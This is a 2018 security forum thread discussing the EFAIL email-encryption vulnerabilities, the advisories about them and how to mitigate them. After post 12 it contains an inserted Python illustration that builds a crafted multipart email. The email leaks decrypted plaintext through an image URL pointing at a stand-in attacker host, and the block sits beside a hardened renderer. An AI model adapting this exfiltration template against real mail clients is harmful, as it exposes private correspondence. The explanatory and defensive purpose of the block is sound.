EFF -- Attention PGP Users: New Vulnerabilities Require You to Take Action Now

Discussion in 'privacy technology' started by mirimir, May 14, 2018.

  1. mirimir

    mirimir Registered Member

    Joined:
    Oct 1, 2011
    Posts:
    8,106
    https://www.eff.org/deeplinks/2018/...w-vulnerabilities-require-you-take-action-now
    https://twitter.com/seecurity/status/995906576170053633
     
  2. reasonablePrivacy

    reasonablePrivacy Registered Member

    Joined:
    Oct 7, 2017
    Posts:
    630
    Location:
    Member state of European Union
    Whoa. What?

    I hope that at least files encrypted using GnuPG with only a symmetric algorithm are safe. I recommended that for backup purposes, and there is even one article written by me somewhere on the Internet.
     
  3. reasonablePrivacy

    reasonablePrivacy Registered Member

    Joined:
    Oct 7, 2017
    Posts:
    630
    Location:
    Member state of European Union
  4. mood

    mood Updates Team

    Joined:
    Oct 27, 2012
    Posts:
    7,701
    EFAIL describes vulnerabilities in the end-to-end encryption technologies OpenPGP and S/MIME that leak the plaintext of encrypted emails.
    https://efail.de

    Full technical paper:
    Breaking S/MIME and OpenPGP Email Encryption using Exfiltration Channels [v0.9 Draft]
    https://efail.de/efail-attack-paper.pdf
     
  5. RockLobster

    RockLobster Registered Member

    Joined:
    Nov 8, 2007
    Posts:
    1,803
    It's got to the point where we may as well just have a generic notice.

    A vulnerability has been discovered in,
    ..enter the name of your favorite software..
    This vulnerability reveals all of your private data to an attacker.
     
  6. mood

    mood Updates Team

    Joined:
    Oct 27, 2012
    Posts:
    7,701
    People Are Freaking Out That PGP Is ‘Broken’—But You Shouldn’t Be Using It Anyway
    May 14, 2018
    https://motherboard.vice.com/en_us/article/3k4nd9/pgp-gpg-efail-vulnerability
     
  7. reasonablePrivacy

    reasonablePrivacy Registered Member

    Joined:
    Oct 7, 2017
    Posts:
    630
    Location:
    Member state of European Union
    GnuPG developers (main open-source OpenPGP implementation) think this is not a hole in the current standard, because standard defines Modification detection codes. GnuPG implements MDCs, so this implementation is sound. Unfortunately a lot of email clients and GUIs for GnuPG are vulnerable.
     
  8. mirimir

    mirimir Registered Member

    Joined:
    Oct 1, 2011
    Posts:
    8,106
  9. BoerenkoolMetWorst

    BoerenkoolMetWorst Registered Member

    Joined:
    Dec 22, 2009
    Posts:
    4,102
    Location:
    Outer space
  10. mirimir

    mirimir Registered Member

    Joined:
    Oct 1, 2011
    Posts:
    8,106
    OK, so Thunderbird plus Enigmail is probably most popular in Linux. And according to Robert J. Hansen:[0]
    So if you use Enigmail, do make sure that you're not at v1.99. Just get the add-on in Thunderbird.

    Also, of course, make sure that external resources aren't being fetched.

    0) https://lists.gnupg.org/pipermail/gnupg-users/2018-May/060321.html

    Edit: Oh, but damn. There's more in that thread. Enigmail >v2 can be forced to decrypt with MDC missing.[1] And this is a gpg bug:[2]
    However:[3]
    I also saw something about it requiring HTML decoding, but can't find it again :(

    1) https://lists.gnupg.org/pipermail/gnupg-users/2018-May/060325.html

    2) https://lists.gnupg.org/pipermail/gnupg-users/2018-May/060329.html

    3) https://lists.gnupg.org/pipermail/gnupg-users/2018-May/060328.html

    More: Yes, disable HTML rendering. In Thunderbird, select "/ View / Message Body As / Plain Text".

    And:[4]
    So basically, 1) the attacker embeds a link to the encrypted message, 2) the email client fetches and decrypts it, and then 3) sends plaintext back to the attacker.

    4) https://lists.cpunks.org/pipermail/cypherpunks/2018-May/042194.html
     
    Last edited: May 14, 2018
  11. mood

    mood Updates Team

    Joined:
    Oct 27, 2012
    Posts:
    7,701
    No, PGP is not broken, not even with the Efail vulnerabilities
    Recently, news broke about potential vulnerabilities in PGP, dubbed Efail. However, despite reports to the contrary, PGP is not actually broken, as we will explain in this post.
    May 15, 2018

    https://protonmail.com/blog/pgp-vulnerability-efail/
     
  12. mirimir

    mirimir Registered Member

    Joined:
    Oct 1, 2011
    Posts:
    8,106
    OK, here's how it works. An attacker has some cyphertext that you created with OpenPGP. So they send you an HTML email, including the cyphertext. Your client decrypts the cyphertext, as usual. But the email is structured so that the resulting plaintext gets incorporated into the URL for an embedded image. So by fetching that "image", your client sends the plaintext to the attacker. An attacker could also generate link URLs that way.

    Clever. The fundamental issue is that OpenPGP doesn't properly vet content piped to email clients. There's also the issue that some email clients don't properly handle warnings from OpenPGP.

    But anyway, there are obvious security practices that block this exploit, even though OpenPGP is vulnerable. Don't render HTML. Only text. Don't fetch remote resources, such as embedded images. And inspect URLs before browsing them. URLs should comprise only host names, and simple folder and file names. No long random-looking strings.

    And seriously, those have been my standard practice for well over a decade.
     
    Last edited: May 16, 2018
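The mechanism described in this post (and the multipart concatenation noted later in the thread), as an added, runnable model. This is not code from the thread, the EFAIL paper, or any mail client. Assumptions: the OpenPGP layer is a base64 stand-in (toy_encrypt/toy_decrypt) so the MIME handling can be shown offline without gpg; the hostnames and the secret message are constructed; naive_render and hardened_render are schematic clients, not any real product. The naive client decrypts inline ciphertext wherever it occurs and glues all parts into one HTML document, so the plaintext lands inside an image URL; the hardened client renders each part on its own, only decrypts a part that is entirely one armored message, and never evaluates HTML, so there is nothing to fetch. suspicious_url is the "inspect URLs before browsing them" rule made mechanical.

```python
# Added illustration of the EFAIL-style direct exfiltration channel (not code
# from the forum thread or the EFAIL paper). The OpenPGP layer is a stand-in:
# toy_encrypt/toy_decrypt only base64 the text inside PGP armor, so the MIME
# handling can be shown offline without gpg. Hostnames and message are constructed.
import base64
import email
import re
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText

ATTACKER = "https://attacker.example/"          # constructed, not a real host
PGP_BLOCK = re.compile(
    r"-----BEGIN PGP MESSAGE-----.*?-----END PGP MESSAGE-----\n?", re.S)


def toy_encrypt(plaintext: str) -> str:
    """Stand-in for an OpenPGP message: base64 inside PGP armor. NOT real crypto."""
    body = base64.b64encode(plaintext.encode()).decode()
    return f"-----BEGIN PGP MESSAGE-----\n\n{body}\n-----END PGP MESSAGE-----\n"


def toy_decrypt(armored: str) -> str:
    """Inverse of toy_encrypt; stands in for the client's call to gpg."""
    lines = [l for l in armored.splitlines() if l and not l.startswith("-----")]
    return base64.b64decode("".join(lines)).decode()


def build_efail_message(stolen_ciphertext: str) -> bytes:
    """The attacker's crafted mail: three MIME parts that, once concatenated,
    form <img src="https://attacker.example/<PLAINTEXT>"> around the victim's
    own (previously captured) ciphertext."""
    msg = MIMEMultipart("mixed")
    msg["From"] = "mallory@attacker.example"
    msg["To"] = "victim@example.org"
    msg["Subject"] = "constructed EFAIL demo"
    msg.attach(MIMEText(f'<img src="{ATTACKER}', "html"))   # opens the tag, src left open
    msg.attach(MIMEText(stolen_ciphertext, "plain"))        # victim's captured ciphertext
    msg.attach(MIMEText('">', "html"))                      # closes src and the tag
    return msg.as_bytes()


def naive_render(raw: bytes) -> list:
    """Vulnerable client: decrypts inline PGP wherever it appears, glues every
    text part into one HTML document, and returns the image URLs it would
    fetch. The decrypted plaintext ends up inside the URL."""
    msg = email.message_from_bytes(raw)
    html = ""
    for part in msg.walk():
        if part.get_content_maintype() == "text":
            text = part.get_payload(decode=True).decode()
            html += PGP_BLOCK.sub(lambda m: toy_decrypt(m.group(0)), text)
    return re.findall(r'<img\s+src="([^"]*)"', html)


def hardened_render(raw: bytes) -> list:
    """Per-part rendering: a part is decrypted only if its whole body is one
    armored message, the result gets its own plain-text view, and parts are
    never merged or evaluated as HTML, so no remote URL is ever assembled."""
    msg = email.message_from_bytes(raw)
    views = []
    for part in msg.walk():
        if part.get_content_maintype() != "text":
            continue
        text = part.get_payload(decode=True).decode()
        if PGP_BLOCK.fullmatch(text):
            views.append(("decrypted", toy_decrypt(text)))
        else:
            views.append((part.get_content_type(), text))   # shown verbatim as text
    return views


def suspicious_url(url: str, max_component: int = 40) -> bool:
    """The post's 'inspect URLs before browsing them' rule, made mechanical:
    whitespace or an over-long path/query component is a red flag."""
    if re.search(r"\s", url):
        return True
    tail = url.split("://", 1)[-1]
    return any(len(c) > max_component for c in re.split(r"[/?&=]", tail))


if __name__ == "__main__":
    secret = "Meet me at the usual place at nine."   # constructed plaintext
    raw = build_efail_message(toy_encrypt(secret))
    print("naive client fetches:", naive_render(raw))
    print("hardened client shows:", hardened_render(raw))
```

Note that the leak does not need the image to load successfully: the request line, plaintext included, is already in the attacker's web log. That is why the fix is on the client side (per-part handling, no HTML, no remote loads), not in the cipher.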
  13. Palancar

    Palancar Registered Member

    Joined:
    Oct 26, 2011
    Posts:
    2,057
    Agreed. I am that + crazy more. I still manually move my encrypted email/data to a separate place and then perform the decryption individually. Then I construct a remote response if desired and manually transfer that to a place to send my response. It's slow of course, but I always trade convenience away for security. It's not a complete air gap, but it's close in a way. In the past few years I am only doing 10 or fewer encrypted emails a day. My system would be too labor-intensive if I were sending 50 emails like many years ago.
     
  14. RockLobster

    RockLobster Registered Member

    Joined:
    Nov 8, 2007
    Posts:
    1,803
    So is this using the same exploit as email tracking pixels use? A link embedded in an email to a tiny invisible remote image?
     
  15. mirimir

    mirimir Registered Member

    Joined:
    Oct 1, 2011
    Posts:
    8,106
    In a sense, yes.

    It leverages how email clients typically decrypt stuff automatically. Say, to yield "this is my plaintext". And how they concatenate pieces of multipart emails. So the email client generates an embedded image URL like "https://foo.xyz/this is my plaintext". And "this is my plaintext" shows up in the server's web log, along with your IP address etc. Whether or not an image actually gets fetched doesn't matter.
     
  16. chrisretusn

    chrisretusn Registered Member

    Joined:
    Jun 16, 2004
    Posts:
    1,377
    Location:
    Philippines
    Okay, I'm no expert, but after reading up on this... I say it's yet another scare alert that really isn't. It's more about email clients not interfacing correctly with PGP, not about OpenPGP. I'm not worried at all over this. I used Claws-Mail, which according to the paper is not affected. That, and I only exchange encrypted messages with a very small number of people; we use plain text only.
     
  17. deBoetie

    deBoetie Registered Member

    Joined:
    Aug 7, 2013
    Posts:
    1,655
    Location:
    UK
    Repeat x1000. HTML is irrevocably designed to leak information to the mainframe you're connected to, and clearly allows unconstrained connections to be made to all and sundry. It presumes display and makes it hard to process headless.

    In other words, a security and privacy disaster.

    In my opinion, email and web browsing should be ditched and secure messaging be used instead, with a schema (NOT HTML!!!!) which cleanly decouples parsing, processing, encryption/decryption and rendering of the content. So that, in an extreme case, the stages could happen in different address spaces (either sandboxes, virtual machines or physical machines). By agreeing a simple xml schema for instance, open source client code could parse content and make it available to the other stages of the process.
     
  18. kdcdq

    kdcdq Registered Member

    Joined:
    Apr 19, 2002
    Posts:
    815
    Location:
    A Non-Sh*thole State
    I just KNEW something was wrong with PGP over a year ago but just couldn't prove it. I expressed my concern to some, uhh, government agencies where I have contacts; silence followed.
     
  19. mirimir

    mirimir Registered Member

    Joined:
    Oct 1, 2011
    Posts:
    8,106
    Sure. But an adversary could have old encrypted messages. From one of your contacts, from a mail server, or whatever.

    And they could send you one of these crafted messages, containing that cyphertext.

    But if Claws-Mail truly isn't vulnerable, no problem.
     
  20. mirimir

    mirimir Registered Member

    Joined:
    Oct 1, 2011
    Posts:
    8,106
    This isn't primarily an OpenPGP issue. It's mainly about how email apps handle encrypted content.
     
  21. kdcdq

    kdcdq Registered Member

    Joined:
    Apr 19, 2002
    Posts:
    815
    Location:
    A Non-Sh*thole State
    Well stated!
     
  22. RockLobster

    RockLobster Registered Member

    Joined:
    Nov 8, 2007
    Posts:
    1,803
    I'm at the point where I almost don't care anymore because I know there is no point.
    Once you understand that it is the agenda that private individuals should not have private communications then you have to know it is the job of multi billion dollar agencies to enforce that agenda. That is what they are paid to do.
    The kind of budgets available means they have almost unlimited resources to assign thousands of coders to infiltrate, fork or take over open source projects for the purpose of breaking security, buy companies that create encryption products for the same reason and infiltrate others including organisations that develop and approve standards and protocols.
    So regardless of this latest known email vulnerability, if the OS and other software is not recording keystrokes, taking screenshots, capturing passwords and encryption keys, implementing weakened encryption etc., we might say those agencies are not worth a damn because they couldn't do the job they have been assigned to do.
    But I think most would agree that is not accurate, they damn sure can do their job.
     
    Last edited: May 20, 2018
  23. mirimir

    mirimir Registered Member

    Joined:
    Oct 1, 2011
    Posts:
    8,106
    https://medium.com/@cipherpunk/efail-a-postmortem-4bef2cea4c08
     
  24. chrisretusn

    chrisretusn Registered Member

    Joined:
    Jun 16, 2004
    Posts:
    1,377
    Location:
    Philippines
  25. mood

    mood Updates Team

    Joined:
    Oct 27, 2012
    Posts:
    7,701
    Statement from PGP developers about eFail
    Recent news reports regarding “eFail” have contained significant errors regarding the security of PGP email encryption. It is necessary to correct the record.
    May 24, 2018

    https://protonmail.com/blog/pgp-efail-statement/
     